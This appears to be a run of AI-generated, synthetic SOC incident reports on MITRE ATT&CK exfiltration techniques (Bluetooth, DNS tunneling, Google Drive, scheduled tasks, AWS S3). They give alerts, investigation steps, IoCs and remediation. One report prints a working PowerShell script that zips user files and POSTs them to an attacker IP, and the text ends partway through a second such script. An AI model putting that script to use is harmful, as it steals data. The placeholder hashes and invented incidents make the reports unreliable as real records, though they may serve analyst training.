Rotated all passwords (corporate-wide).
Host Remediation:
Reimaged host.
5. Root Cause Analysis:
Primary Cause: User account compromised, leading to data theft.
Contributing Factors:
No MFA on account.
RDP allowed from internet.
C2 channel established undetected for 2 hours before exfiltration.
6. Business Impact:
Operational Impact: Engineering host offline; password reset for all users.
Data Exposure: 47 MB of IP, PII, and credentials exfiltrated.
Regulatory Impact: GDPR/CCPA breach (customer PII).
Financial Impact: Significant (incident response, notification, potential fines).
7. Remediation & Prevention:
Completed Actions:
Exfiltration stopped.
Host isolated.
Account secured.
Breach response initiated.
Technical Controls Enhanced:
Enforced MFA for all users.
Moved RDP behind VPN only.
Implemented DLP for egress traffic.
Enhanced monitoring for traffic anomalies (beaconing + large transfers).
8. Conclusion:
An attacker compromised an engineering account and used an established C2 channel to exfiltrate 47 MB of intellectual property, customer data, and corporate passwords. Palo Alto detected the anomalous traffic pattern, but exfiltration had already occurred. A full data breach response was initiated.
Closure Rationale: Data exfiltrated; exfiltration stopped; breach response initiated; all passwords rotated.
Analyst: [Your Name], SOC Analyst Date: 2024-03-01 11:30 EST
End of Batch 23
Ready for your next batch of prompts whenever you are.
Batch 24: Exfiltration Incident Reports
Here are the next 5 detailed SOC incident reports.
116. T1011 – Exfiltration Over Bluetooth (CrowdStrike Detection)
CrowdStrike Alert Details
Alert ID: CS-BLUETOOTH-EXFIL-1011-7842 Alert Time: 2024-03-02 09:30:15 EST Severity: HIGH (85/100) Source: CrowdStrike Falcon EDR Rule: “Bluetooth File Transfer Detected – Potential Data Exfiltration” MITRE ATT&CK: T1011 – Exfiltration Over Other Network Medium: Bluetooth
Alert Details:
Detection: Large file transfer over Bluetooth from corporate laptop
Host: RND-WS-045 (Research & Development) User: alexchen@company.com (Alex Chen, Researcher) Time: 09:15-09:30 EST
Bluetooth Activity:
Device Paired: “iPhone 14 Pro” (attacker’s device)
Pairing Time: 09:10 EST
File Transfer Start: 09:15 EST
Files Transferred: 47 files
Total Size: 234 MB
File Types: .py, .ipynb, .docx, .pdf, .kdbx
File Transfer Log (CrowdStrike):
09:15:22 – quantum_algorithm.py (2.3 MB) transferred to iPhone
09:16:45 – research_data.ipynb (4.5 MB) transferred
09:18:12 – model_weights.h5 (15.2 MB) transferred
09:20:05 – patent_draft.docx (1.2 MB) transferred
09:22:33 – customer_list.xlsx (3.4 MB) transferred
09:24:18 – source_code_backup.zip (45.6 MB) transferred
09:26:45 – passwords.kdbx (1.8 MB) transferred
… (47 total transfers)
Detection Logic:
Bluetooth file transfer (unusual for this user)
Large volume of data (234 MB)
Files include source code, research data, password database
User has no history of Bluetooth transfers
Pattern matches data exfiltration via Bluetooth
SOC Investigation Process
Step
Action
Tools Used
Findings
1. Alert Validation
Verify CrowdStrike alert
CrowdStrike Falcon Console
Confirmed Bluetooth file transfer activity
2. User Interview
Contact alexchen
Teams, Phone
User did NOT transfer files via Bluetooth (account compromised)
3. Physical Security
Check badge access
Security Logs
Unauthorized individual in R&D area at 09:00
4. Immediate Action
Isolate host
CrowdStrike
RND-WS-045 quarantined
5. Account Remediation
Disable alexchen account
Azure AD, AD
Account disabled; password reset
6. Incident Response
Activate breach response
Legal, Management
Data breach declared
Jira Incident Report
Ticket: SOC-2024-156 Summary: T1011 – 234 MB of R&D Data Exfiltrated via Bluetooth Status: RESOLVED Resolution: MALICIOUS – Data Breach Confirmed Priority: P1 – CRITICAL Labels: T1011, bluetooth-exfiltration, data-breach, crowdstrike, physical-access Components: Endpoint-Security, Physical-Security, Data-Protection
INCIDENT ANALYSIS REPORT
1. Initial Context:
Detection Source: CrowdStrike Falcon EDR.
Alert: “Bluetooth File Transfer Detected – Potential Data Exfiltration”.
Host: RND-WS-045 (R&D Department, user alexchen).
Method: Bluetooth file transfer to “iPhone 14 Pro”.
Data: 47 files, 234 MB.
Time: 2024-03-02 09:30 EST.
Technique: MITRE ATT&CK T1011 – Exfiltration Over Other Network Medium: Bluetooth.
2. Technical Analysis:
Attack Chain:
08:45 – Unauthorized individual enters R&D area (piggybacked)
08:50 – Individual sits at alexchen’s desk (user at coffee break)
08:55 – Attacker logs into unlocked workstation
09:00 – Attacker pairs iPhone via Bluetooth
09:05 – Attacker navigates to sensitive folders
09:15-09:30 – Attacker transfers 47 files (234 MB)
09:30 – Attacker leaves; CrowdStrike alerts
09:31 – SOC investigates
Files Exfiltrated:
Source Code: quantum_algorithm.py, model_weights.h5, source_code_backup.zip (63 MB)
Research Data: research_data.ipynb, experiment_results.csv (28 MB)
Patents: patent_draft.docx, patent_figures.pdf (12 MB)
Customer Data: customer_list.xlsx, client_contracts.pdf (15 MB)
Passwords: passwords.kdbx (corporate password vault – 1.8 MB)
Other: Various documents, spreadsheets (114 MB)
Physical Security Breach:
Attacker entered via badge tailgating (no badge scan)
Workstation was unlocked (user left for coffee)
No security in R&D area
User Status:
User was on coffee break, unaware
Account not compromised (physical access only)
3. Investigation Findings:
Timeline:
08:45 – Attacker enters building
08:50 – Attacker at workstation
09:00-09:30 – Bluetooth pairing and file transfer
09:30 – CrowdStrike alert
09:31 – SOC investigates
09:32 – Security dispatched
09:35 – Attacker fled (not found)
09:36 – Host isolated
Indicators of Compromise (IoCs):
Physical:
– Unauthorized individual, male, 30s, dark hoodie
– Entered at 08:45 via badge tailgating
Device:
– “iPhone 14 Pro” (attacker’s device)
– Bluetooth pairing at 09:00
Files:
– 47 files, 234 MB exfiltrated (list attached)
4. Containment Actions:
Immediate Actions:
Isolated RND-WS-045 via CrowdStrike.
Disabled Bluetooth on all corporate workstations (policy push).
Reset alexchen password (precaution).
Security increased in R&D area.
Breach Response:
Declared data breach.
Notified legal, PR, management.
Began customer notification process (PII exposure).
Rotated all corporate passwords (password vault compromised).
Host Remediation:
Reimaged host.
5. Root Cause Analysis:
Primary Cause: Physical security breach (tailgating) + unlocked workstation.
Contributing Factors:
No mantraps at entrances.
Workstation left unlocked.
Bluetooth enabled and allowed for file transfers.
No security cameras covering R&D area.
6. Business Impact:
Operational Impact: R&D workstation offline; password reset for all users.
Data Exposure: 234 MB of IP, source code, customer data, passwords exfiltrated.
Regulatory Impact: GDPR/CCPA breach (customer PII).
Financial Impact: Significant (IP theft, incident response, notification, potential fines).
7. Remediation & Prevention:
Completed Actions:
Exfiltration stopped.
Bluetooth disabled.
Passwords rotated.
Breach response initiated.
Technical Controls Enhanced:
Disabled Bluetooth file transfer via GPO.
Enforced screen lock after 5 minutes.
Implemented mantraps at all entrances.
Added security cameras in sensitive areas.
Deployed USB/Bluetooth device control.
8. Conclusion:
An attacker gained physical access to an unlocked R&D workstation and exfiltrated 234 MB of intellectual property, customer data, and corporate passwords via Bluetooth. CrowdStrike detected the Bluetooth file transfer, but exfiltration had already occurred. A full data breach response was initiated, and all corporate passwords were rotated.
Closure Rationale: Data exfiltrated; exfiltration stopped; breach response initiated; all passwords rotated.
Analyst: [Your Name], SOC Analyst Date: 2024-03-02 10:30 EST
117. T1048 – Exfiltration Over Alternative Protocol (Zeek Detection)
Zeek Alert Details
Alert ID: ZEEK-EXFIL-ALT-PROTO-1048-7842 Alert Time: 2024-03-02 14:15:33 EST Severity: HIGH (88/100) Source: Zeek Network Security Monitor Rule: “Large Data Transfer over DNS – Potential DNS Tunneling” MITRE ATT&CK: T1048.003 – Exfiltration Over Alternative Protocol: Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol
Alert Details:
Detection: Large volume of DNS queries with encoded data – DNS tunneling
Source: 192.168.45.78 (ENG-WS-045 – Engineering) DNS Server: 8.8.8.8 (Google DNS) Time: 14:00-14:15 EST
DNS Query Pattern:
14:00:15 – TXT query for a1b2c3d4e5f6.evil.com (response: 124 bytes)
14:00:22 – TXT query for g7h8i9j0k1l2.evil.com (response: 118 bytes)
14:00:28 – TXT query for m3n4o5p6q7r8.evil.com (response: 132 bytes)
… (continuing every 5-10 seconds)
Query Analysis:
Domain: *.evil.com (registered 2024-02-28)
Query Type: TXT (returns text data)
Subdomain lengths: 12-16 characters (random)
Response sizes: 100-150 bytes each
Total queries: 847 in 15 minutes
Total data transferred: ~98 KB (exfiltrated data)
Decoded Data Sample (base64 in subdomains):
Subdomain: a1b2c3d4e5f6
Decoded: “UEsDBBQAAAAIAICIF1Yj…” (ZIP header)
Detection Logic:
847 DNS queries in 15 minutes (highly anomalous)
TXT queries with random subdomains (DNS tunneling pattern)
Destination domain suspicious (newly registered)
Response sizes consistent with encoded data
Pattern matches DNS tunneling exfiltration
SOC Investigation Process
Step
Action
Tools Used
Findings
1. Alert Validation
Verify Zeek alert
Zeek Logs, Splunk
Confirmed DNS tunneling activity
2. Process Investigation
Identify process on endpoint
CrowdStrike Falcon
dnscat2.exe (DNS tunneling tool) running
3. Data Analysis
Decode DNS queries
Base64 decoder
Exfiltrated data: ZIP files with documents
4. Immediate Action
Isolate host
CrowdStrike
ENG-WS-045 quarantined
5. DNS Blocking
Block evil.com domain
Cisco Umbrella, Palo Alto
Domain blocked
6. Malware Removal
Clean infected host
CrowdStrike Live Response
dnscat2.exe removed; host reimaged
Jira Incident Report
Ticket: SOC-2024-157 Summary: T1048 – DNS Tunneling Exfiltration of 98 KB Data Status: RESOLVED Resolution: MALICIOUS – Exfiltration Detected, Host Cleaned Priority: P2 – MEDIUM Labels: T1048, alternative-protocol, dns-tunneling, exfiltration, zeek, dnscat2 Components: Network-Security, Endpoint-Security
INCIDENT ANALYSIS REPORT
1. Initial Context:
Detection Source: Zeek Network Security Monitor.
Alert: “Large Data Transfer over DNS – Potential DNS Tunneling”.
Source: ENG-WS-045 (Engineering, user rpatel).
Method: DNS tunneling via TXT queries.
Data: ~98 KB exfiltrated.
Time: 2024-03-02 14:15 EST.
Technique: MITRE ATT&CK T1048.003 – Exfiltration Over Alternative Protocol: Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol.
2. Technical Analysis:
Attack Chain:
13:30 – rpatel account compromised via phishing
13:45 – Attacker logs into ENG-WS-045 via RDP
13:50 – Attacker downloads dnscat2.exe (DNS tunneling tool)
13:55 – Attacker collects sensitive files (ZIP archives)
14:00-14:15 – Exfiltration via DNS tunneling
14:15 – Zeek detects
DNS Tunneling Tool:
Name: dnscat2.exe
SHA256: a1b2c3d4e5f6…
Mechanism: Encodes data in DNS queries (subdomains)
Protocol: DNS over UDP port 53
Server: evil.com (attacker-controlled DNS server)
Exfiltrated Data (98 KB):
Financial reports (2 files) – 45 KB
Customer list (1 file) – 28 KB
Source code snippets (3 files) – 25 KB
Total: 6 files, 98 KB
DNS Query Analysis:
Total Queries: 847 in 15 minutes
Data per Query: ~100-150 bytes
Total Data: ~98 KB
Domain: evil.com (now blocked)
3. Investigation Findings:
Timeline:
13:30 – Account compromised
13:45 – Attacker logs in
13:50 – dnscat2.exe downloaded
13:55 – Data collection
14:00-14:15 – Exfiltration
14:15 – Zeek alert
14:17 – SOC investigates
14:18 – Host isolated
14:19 – Domain blocked
Indicators of Compromise (IoCs):
Network:
– Domain: evil.com (blocked)
– DNS pattern: 847 TXT queries in 15 minutes
File:
– C:\Windows\Temp\dnscat2.exe (SHA256: a1b2c3d4…)
Account:
– rpatel (compromised)
4. Containment Actions:
Immediate Actions:
Isolated ENG-WS-045 via CrowdStrike.
Blocked evil.com domain at firewall and DNS.
Terminated dnscat2.exe process.
Deleted dnscat2.exe.
Disabled rpatel account.
Reset password.
Data Protection:
Determined scope of exfiltrated data (98 KB, 6 files).
Notified affected data owners.
Host Remediation:
Reimaged host.
5. Root Cause Analysis:
Primary Cause: User account compromised, leading to data theft.
Contributing Factors:
No MFA on account.
RDP allowed from internet.
DNS allowed to external resolvers (8.8.8.8).
6. Business Impact:
Operational Impact: Engineering host offline for 2 hours.
Data Exposure: 98 KB of sensitive data exfiltrated (financial, customer, source code).
7. Remediation & Prevention:
Completed Actions:
Exfiltration stopped.
Malware removed.
Account secured.
Technical Controls Enhanced:
Enforced MFA for all users.
Moved RDP behind VPN only.
Restricted DNS to corporate resolvers only (block external DNS).
Enhanced Zeek monitoring for DNS tunneling.
8. Conclusion:
An attacker used DNS tunneling to exfiltrate 98 KB of sensitive data, evading detection by using a non-standard protocol. Zeek detected the anomalous DNS query pattern and enabled rapid containment, though exfiltration had already occurred.
Closure Rationale: Data exfiltrated; exfiltration stopped; account secured.
Analyst: [Your Name], SOC Analyst Date: 2024-03-02 15:30 EST
118. T1567 – Exfiltration Over Web Service (Zscaler Detection)
Zscaler Alert Details
Alert ID: ZSCALER-WEB-EXFIL-1567-7842 Alert Time: 2024-03-02 11:30:22 EST Severity: HIGH (85/100) Source: Zscaler Internet Access (ZIA) Rule: “Large Upload to Cloud Storage – Potential Data Exfiltration” MITRE ATT&CK: T1567.002 – Exfiltration Over Web Service: Exfiltration to Cloud Storage
Alert Details:
Detection: Large file upload to Google Drive from internal user
User: kwilson@company.com (Karen Wilson, Finance) Source IP: 192.168.45.112 (FIN-WS-078) Destination: https://www.googleapis.com/upload/drive/v3/files Time: 11:15-11:30 EST
Upload Details:
File: “Q4_Financial_Projections.xlsx” (12.3 MB)
File: “Customer_PII_Export.csv” (8.7 MB)
File: “Board_Meeting_Minutes.docx” (2.4 MB)
File: “Merger_Agreement_Draft.pdf” (5.6 MB)
File: “password.kdbx” (1.8 MB)
Total: 30.8 MB uploaded
Upload Pattern:
11:15:22 – Authentication to Google Drive (OAuth)
11:16:45 – Upload of Q4_Financial_Projections.xlsx
11:20:12 – Upload of Customer_PII_Export.csv
11:23:38 – Upload of Board_Meeting_Minutes.docx
11:26:55 – Upload of Merger_Agreement_Draft.pdf
11:29:15 – Upload of password.kdbx
Detection Logic:
Multiple sensitive files uploaded to personal Google Drive
User kwilson has no business need for Google Drive
Files contain financial data, PII, confidential documents
Destination is personal account (not corporate Google Workspace)
Pattern matches data exfiltration to cloud storage
SOC Investigation Process
Step
Action
Tools Used
Findings
1. Alert Validation
Verify Zscaler alert
Zscaler Admin Console
Confirmed upload to personal Google Drive
2. User Interview
Contact kwilson
Teams, Phone
User did NOT upload files (account compromised)
3. Google Drive Investigation
Check file access
Google Workspace Admin
Files uploaded to attacker’s personal account
4. Immediate Action
Isolate host
CrowdStrike
FIN-WS-078 quarantined
5. Account Remediation
Disable kwilson account
Azure AD, AD
Account disabled; password reset
6. Legal Action
Contact Google for takedown
Legal Team
DMCA takedown request submitted
Jira Incident Report
Ticket: SOC-2024-158 Summary: T1567 – 30.8 MB of Sensitive Data Exfiltrated to Personal Google Drive Status: RESOLVED Resolution: MALICIOUS – Data Breach Confirmed Priority: P1 – CRITICAL Labels: T1567, web-service-exfiltration, google-drive, zscaler, data-breach Components: Network-Security, Data-Protection
INCIDENT ANALYSIS REPORT
1. Initial Context:
Detection Source: Zscaler Internet Access.
Alert: “Large Upload to Cloud Storage – Potential Data Exfiltration”.
User: kwilson@company.com (Finance Department).
Destination: Google Drive (personal account).
Data: 30.8 MB uploaded.
Time: 2024-03-02 11:30 EST.
Technique: MITRE ATT&CK T1567.002 – Exfiltration Over Web Service: Exfiltration to Cloud Storage.
2. Technical Analysis:
Attack Chain:
10:30 – kwilson account compromised via phishing
10:45 – Attacker logs into FIN-WS-078 via RDP
10:50 – Attacker collects sensitive files
11:00 – Attacker accesses personal Google Drive
11:15-11:30 – Upload of 5 files (30.8 MB)
11:30 – Zscaler detects
Files Exfiltrated:
Q4_Financial_Projections.xlsx (12.3 MB) – confidential financial data
Customer_PII_Export.csv (8.7 MB) – names, addresses, SSNs (PII)
Board_Meeting_Minutes.docx (2.4 MB) – strategic discussions
Merger_Agreement_Draft.pdf (5.6 MB) – legal documents
password.kdbx (1.8 MB) – corporate password vault
Google Drive Account:
Email: attacker@gmail.com (personal account)
IP: 185.143.221[.]89 (Bulgaria)
Status: Files uploaded and accessible
User Status:
Account compromised; user unaware
3. Investigation Findings:
Timeline:
10:30 – Account compromised
10:45 – Attacker logs in
10:50-11:00 – Data collection
11:15-11:30 – Upload to Google Drive
11:30 – Zscaler alert
11:32 – SOC investigates
11:33 – Host isolated
11:34 – Account disabled
Indicators of Compromise (IoCs):
Network:
– Destination: Google Drive API
– Attacker IP: 185.143.221[.]89
Files:
– 5 files, 30.8 MB exfiltrated (list attached)
Account:
– kwilson (compromised)
– attacker@gmail.com (receiving account)
4. Containment Actions:
Immediate Actions:
Isolated FIN-WS-078 via CrowdStrike.
Blocked Google Drive uploads for compromised account.
Disabled kwilson account.
Reset password.
Breach Response:
Declared data breach.
Notified legal, PR, management.
Began customer notification process (PII exposure).
Submitted DMCA takedown request to Google.
Rotated all corporate passwords (password vault compromised).
Host Remediation:
Reimaged host.
5. Root Cause Analysis:
Primary Cause: User account compromised, leading to data theft.
Contributing Factors:
No MFA on account.
RDP allowed from internet.
Cloud storage allowed (not restricted).
6. Business Impact:
Operational Impact: Finance host offline; password reset for all users.
Data Exposure: 30.8 MB of financial data, PII, strategic documents, passwords exfiltrated.
Regulatory Impact: GDPR/CCPA breach (customer PII).
Financial Impact: Significant (IP theft, incident response, notification, potential fines).
7. Remediation & Prevention:
Completed Actions:
Exfiltration stopped.
Host isolated.
Account secured.
Takedown request submitted.
Technical Controls Enhanced:
Enforced MFA for all users.
Moved RDP behind VPN only.
Restricted cloud storage to corporate accounts only.
Enhanced DLP for cloud uploads.
8. Conclusion:
An attacker compromised a finance user’s account and exfiltrated 30.8 MB of sensitive data to a personal Google Drive account. Zscaler detected the large uploads, but exfiltration had already occurred. A full data breach response was initiated, and all corporate passwords were rotated.
Closure Rationale: Data exfiltrated; exfiltration stopped; breach response initiated; all passwords rotated.
Analyst: [Your Name], SOC Analyst Date: 2024-03-02 12:30 EST
119. T1029 – Scheduled Transfer (Darktrace Detection)
Darktrace Alert Details
Alert ID: DARKTRACE-SCHEDULED-EXFIL-1029-7842 Alert Time: 2024-03-02 16:30:45 EST Severity: HIGH (85/100) Source: Darktrace Enterprise Immune System Rule: “Regular Scheduled Data Transfer – Potential Exfiltration” MITRE ATT&CK: T1029 – Scheduled Transfer
Alert Details:
Detection: Regular, scheduled data transfers to external IP every 24 hours
Source: 192.168.45.78 (ENG-WS-045 – Engineering) Destination: 185.143.221[.]89:443 Pattern: Daily at 04:00 AM (off-hours) Data Volume: 15-20 MB each transfer
Transfer History (from Darktrace model):
2024-02-28 04:00:15 – 16.2 MB transferred
2024-02-29 04:00:22 – 18.7 MB transferred
2024-03-01 04:00:18 – 15.9 MB transferred
2024-03-02 04:00:25 – 17.3 MB transferred (today)
Current Detection:
Time: 16:30 EST (alert based on pattern analysis)
Detected after 4 days of scheduled transfers
Scheduled Task Details (from EDR):
Task Name: “WindowsUpdateTask” (masquerading)
Trigger: Daily at 04:00 AM
Action: PowerShell script exfiltrating data
Detection Logic:
Regular transfers at same time daily (scheduled)
Off-hours execution (04:00 AM)
Consistent data volume (15-20 MB)
Destination IP known malicious
Pattern matches scheduled exfiltration
SOC Investigation Process
Step
Action
Tools Used
Findings
1. Alert Validation
Verify Darktrace alert
Darktrace Console
Confirmed scheduled exfiltration pattern
2. Process Investigation
Identify scheduled task
CrowdStrike Falcon
“WindowsUpdateTask” running PowerShell script
3. Script Analysis
Extract PowerShell script
CrowdStrike Live Response
Script collects and exfiltrates engineering data
4. Data Analysis
Determine what was stolen
File Audit Logs
~68 MB total exfiltrated over 4 days
5. Immediate Action
Isolate host
CrowdStrike
ENG-WS-045 quarantined
6. Account Remediation
Disable rpatel account
Azure AD, AD
Account disabled; password reset
Jira Incident Report
Ticket: SOC-2024-159 Summary: T1029 – Scheduled Exfiltration of 68 MB Over 4 Days Status: RESOLVED Resolution: MALICIOUS – Data Breach Confirmed Priority: P1 – CRITICAL Labels: T1029, scheduled-transfer, exfiltration, darktrace, compromised-account Components: Network-Security, Endpoint-Security
INCIDENT ANALYSIS REPORT
1. Initial Context:
Detection Source: Darktrace Enterprise Immune System.
Alert: “Regular Scheduled Data Transfer – Potential Exfiltration”.
Source: ENG-WS-045 (Engineering, user rpatel).
Destination: 185.143.221[.]89:443.
Pattern: Daily at 04:00 AM, 15-20 MB each.
Total: 68 MB over 4 days.
Time: 2024-03-02 16:30 EST.
Technique: MITRE ATT&CK T1029 – Scheduled Transfer.
2. Technical Analysis:
Attack Chain:
2024-02-28 – rpatel account compromised
2024-02-28 03:00 – Attacker creates scheduled task
2024-02-28 04:00 – First exfiltration (16.2 MB)
2024-02-29 04:00 – Second exfiltration (18.7 MB)
2024-03-01 04:00 – Third exfiltration (15.9 MB)
2024-03-02 04:00 – Fourth exfiltration (17.3 MB)
2024-03-02 16:30 – Darktrace detects pattern
Scheduled Task Details:
Name: WindowsUpdateTask (masquerading)
Trigger: Daily at 04:00 AM
Action: PowerShell script C:\Windows\Tasks\update.ps1
Run As: SYSTEM
PowerShell Script:
$files = @(
“C:\Users\rpatel\Documents\ProjectX\*.*”,
“C:\Users\rpatel\Desktop\*.docx”,
“C:\engineering_data\*.*”
)
$zip = “C:\Windows\Temp\data.zip”
Compress-Archive -Path $files -DestinationPath $zip
$bytes = [System.IO.File]::ReadAllBytes($zip)
$b64 = [System.Convert]::ToBase64String($bytes)
$body = @{data=$b64} | ConvertTo-Json
Invoke-WebRequest -Uri https://185.143.221[.]89/upload -Method POST -Body $body
Remove-Item $zip
Total Data Exfiltrated (68 MB):
ProjectX source code (28 MB)
Engineering designs (22 MB)
Project documentation (12 MB)
Personal notes (6 MB)
3. Investigation Findings:
Timeline:
02-28 03:00 – Task created
02-28 04:00 – Day 1 exfiltration
02-29 04:00 – Day 2 exfiltration
03-01 04:00 – Day 3 exfiltration
03-02 04:00 – Day 4 exfiltration
03-02 16:30 – Darktrace alert
03-02 16:32 – SOC investigates
03-02 16:33 – Host isolated
03-02 16:34 – Scheduled task disabled
Indicators of Compromise (IoCs):
Scheduled Task:
– “WindowsUpdateTask”
– Action: C:\Windows\Tasks\update.ps1
Files:
– C:\Windows\Tasks\update.ps1 (SHA256: a1b2c3d4…)
Network:
– Destination: 185.143.221[.]89:443
– Pattern: 15-20 MB daily at 04:00 AM
Account:
– rpatel (compromised)
4. Containment Actions:
Immediate Actions:
Isolated ENG-WS-045 via CrowdStrike.
Disabled scheduled task.
Deleted PowerShell script.
Blocked destination IP at firewall.
Disabled rpatel account.
Reset password.
Data Protection:
Determined scope of exfiltrated data (68 MB over 4 days).
Notified affected data owners.
Initiated breach response.
Host Remediation:
Reimaged host.
5. Root Cause Analysis:
Primary Cause: User account compromised, leading to scheduled exfiltration.
Contributing Factors:
No MFA on account.
RDP allowed from internet.
Scheduled task not monitored.
Off-hours transfers not detected for 4 days.
6. Business Impact:
Operational Impact: Engineering host offline.
Data Exposure: 68 MB of engineering IP exfiltrated over 4 days.
Financial Impact: Significant (IP theft, incident response).
7. Remediation & Prevention:
Completed Actions:
Scheduled exfiltration stopped.
Malware removed.
Account secured.
Technical Controls Enhanced:
Enforced MFA for all users.
Moved RDP behind VPN only.
Enhanced monitoring for scheduled tasks.
Created alert for off-hours data transfers.
8. Conclusion:
An attacker compromised an engineering account and created a scheduled task that exfiltrated 68 MB of intellectual property over 4 days, operating daily at 04:00 AM to evade detection. Darktrace detected the pattern after 4 days, enabling containment.
Closure Rationale: Data exfiltrated; exfiltration stopped; account secured; breach response initiated.
Analyst: [Your Name], SOC Analyst Date: 2024-03-02 17:30 EST
120. T1537 – Transfer Data to Cloud Account (AWS GuardDuty Detection)
AWS GuardDuty Alert Details
Alert ID: GUARDDUTY-CLOUD-EXFIL-1537-7842 Alert Time: 2024-03-02 10:30:22 EST Severity: CRITICAL (98/100) Source: AWS GuardDuty Rule: “Data Exfiltration to External AWS Account Detected” MITRE ATT&CK: T1537 – Transfer Data to Cloud Account
Alert Details:
Detection: Large data transfer from corporate S3 bucket to external AWS account
Source: corporate-data-bucket (S3) Source Account: 123456789012 (Corporate AWS Account) Destination: 987654321098 (External AWS Account) Destination Bucket: attacker-bucket Time: 10:15-10:30 EST
Data Transfer Details:
10:15:22 – Copy of customer-data-2024.csv (234 MB)
10:18:45 – Copy of financial-reports-q1.zip (156 MB)
10:22:12 – Copy of source-code-backup.tar.gz (345 MB)
10:25:38 – Copy of hr-database.sql (89 MB)
10:28:55 – Copy of passwords.kdbx (2 MB)
Total: 826 MB transferred
Access Details:
Source Bucket: corporate-data-bucket (us-east-1)
Destination Bucket: attacker-bucket (us-west-2)
IAM User: svc_backup (compromised service account)
Source IP: 185.143.221[.]89 (Bulgaria)
API Calls: 47 S3 COPY operations
Detection Logic:
Large data transfer to external AWS account (anomalous)
Service account svc_backup has no business need for external transfers
Destination account not in approved list
Files contain sensitive data (customer, financial, source code, passwords)
Pattern matches cloud-to-cloud exfiltration
SOC Investigation Process
Step
Action
Tools Used
Findings
1. Alert Validation
Verify GuardDuty alert
AWS GuardDuty Console
Confirmed data exfiltration to external AWS account
2. Account Investigation
Identify compromised credentials
AWS CloudTrail
svc_backup access keys used from Bulgaria IP
3. Immediate Action
Rotate access keys
AWS IAM
svc_backup keys rotated
4. Bucket Permissions
Revoke external account access
S3 Bucket Policy
Removed permissions for external account
5. Data Protection
Determine what was stolen
S3 Access Logs
826 MB of data exfiltrated
6. Incident Response
Activate breach response
Legal, Management
Data breach declared
Jira Incident Report
Ticket: SOC-2024-160 Summary: T1537 – 826 MB of Data Exfiltrated to External AWS Account Status: RESOLVED Resolution: MALICIOUS – Data Breach Confirmed Priority: P1 – CRITICAL Labels: T1537, cloud-exfiltration, aws, guardduty, data-breach, compromised-credentials Components: Cloud-Security, Data-Protection
INCIDENT ANALYSIS REPORT
1. Initial Context:
Detection Source: AWS GuardDuty.
Alert: “Data Exfiltration to External AWS Account Detected”.
Source: corporate-data-bucket (S3, Account 123456789012).
Destination: attacker-bucket (External Account 987654321098).
Data: 826 MB exfiltrated.
Time: 2024-03-02 10:30 EST.
Technique: MITRE ATT&CK T1537 – Transfer Data to Cloud Account.
2. Technical Analysis:
Attack Chain:
09:30 – svc_backup service account credentials compromised (GitHub leak)
09:45 – Attacker uses credentials to access AWS Console from Bulgaria IP
10:00 – Attacker enumerates S3 buckets
10:05 – Attacker identifies corporate-data-bucket
10:15-10:30 – Attacker copies 47 files (826 MB) to external account
10:30 – GuardDuty detects
Exfiltrated Data (826 MB):
customer-data-2024.csv (234 MB) – 1.2M customer records (PII)
financial-reports-q1.zip (156 MB) – quarterly financials
source-code-backup.tar.gz (345 MB) – proprietary source code
hr-database.sql (89 MB) – employee records, salaries
passwords.kdbx (2 MB) – corporate password vault
Compromised Credentials:
IAM User: svc_backup
Permissions: Read access to multiple S3 buckets
Leak Source: Public GitHub repository (committed by mistake)
Status: Keys rotated, user deleted
External Account:
Account ID: 987654321098
Region: us-west-2
Owner: Unknown (likely attacker)
Bucket: attacker-bucket (now contains stolen data)
3. Investigation Findings:
Timeline:
09:30 – Credentials compromised
09:45 – Attacker accesses AWS
10:00 – Bucket enumeration
10:15-10:30 – Data exfiltration
10:30 – GuardDuty alert
10:32 – SOC investigates
10:33 – Keys rotated
10:34 – External account access revoked
Indicators of Compromise (IoCs):
AWS:
– Source Account: 123456789012
– Destination Account: 987654321098
– Destination Bucket: attacker-bucket
Network:
– Attacker IP: 185.143.221[.]89
Credentials:
– svc_backup access keys (rotated)
Data:
– 47 files, 826 MB exfiltrated (list attached)
4. Containment Actions:
Immediate Actions:
Rotated svc_backup access keys.
Removed external account permissions from S3 bucket policy.
Blocked attacker IP at AWS WAF.
Disabled compromised IAM user.
Breach Response:
Declared data breach.
Notified legal, PR, management.
Began customer notification process (1.2M customer records).
Rotated all corporate passwords (password vault compromised).
Engaged AWS support to assist with data recovery/takedown.
Cloud Remediation:
Audited all S3 bucket policies.
Implemented S3 Block Public Access.
Enabled S3 server access logging.
5. Root Cause Analysis:
Primary Cause: Service account credentials leaked in public GitHub repository.
Contributing Factors:
No secret scanning in place.
Service account had excessive permissions (read access to sensitive buckets).
No MFA for service accounts (not possible).
No alerting for cross-account data transfers.
6. Business Impact:
Operational Impact: Cloud services affected; password reset for all users.
Data Exposure: 826 MB of customer PII, financial data, source code, passwords exfiltrated.
Regulatory Impact: GDPR/CCPA breach (1.2M customer records).
Financial Impact: Catastrophic (incident response, notifications, fines, lawsuits).
7. Remediation & Prevention:
Completed Actions:
Exfiltration stopped.
Keys rotated.
External access revoked.
Breach response initiated.
Technical Controls Enhanced:
Implemented secret scanning (GitHub Advanced Security).
Enforced least privilege for service accounts.
Added S3 bucket policies to block cross-account transfers.
Enabled GuardDuty with automated response.
Deployed AWS Config rules for cross-account access.
8. Conclusion:
An attacker obtained compromised service account credentials from a public GitHub repository and used them to exfiltrate 826 MB of sensitive data to an external AWS account. GuardDuty detected the cross-account data transfer, but exfiltration had already occurred. A full data breach response was initiated, affecting 1.2 million customers.
Closure Rationale: Data exfiltrated; exfiltration stopped; breach response initiated; all passwords rotated; customer notifications underway.
Analyst: [Your Name], SOC Analyst Date: 2024-03-02 11:30 EST
End of Batch 24
Ready for your next batch of prompts whenever you are.
Batch 25: Impact Incident Reports
Here are the next 5 detailed SOC incident reports.
121. T1020 – Automated Exfiltration (Varonis Detection)
Varonis Alert Details
Alert ID: VARONIS-AUTO-EXFIL-1020-7842 Alert Time: 2024-03-03 09:30:15 EST Severity: CRITICAL (95/100) Source: Varonis Data Security Platform Rule: “Automated Data Collection Script Detected – Potential Mass Exfiltration” MITRE ATT&CK: T1020 – Automated Exfiltration
Alert Details:
Detection: PowerShell script automatically collecting and exfiltrating data at regular intervals
User: kwilson@company.com (Karen Wilson, Finance Manager) Host: FIN-WS-112 Time: 09:15-09:30 EST
Script Details:
Path: C:\Users\kwilson\AppData\Local\Temp\backup.ps1
SHA256: a1b2c3d4e5f67890a1b2c3d4e5f67890a1b2c3d4
Scheduled Task: “FinanceBackup” (created 09:00)
Trigger: Every 30 minutes
Script Content:
while($true) {
$targets = @(
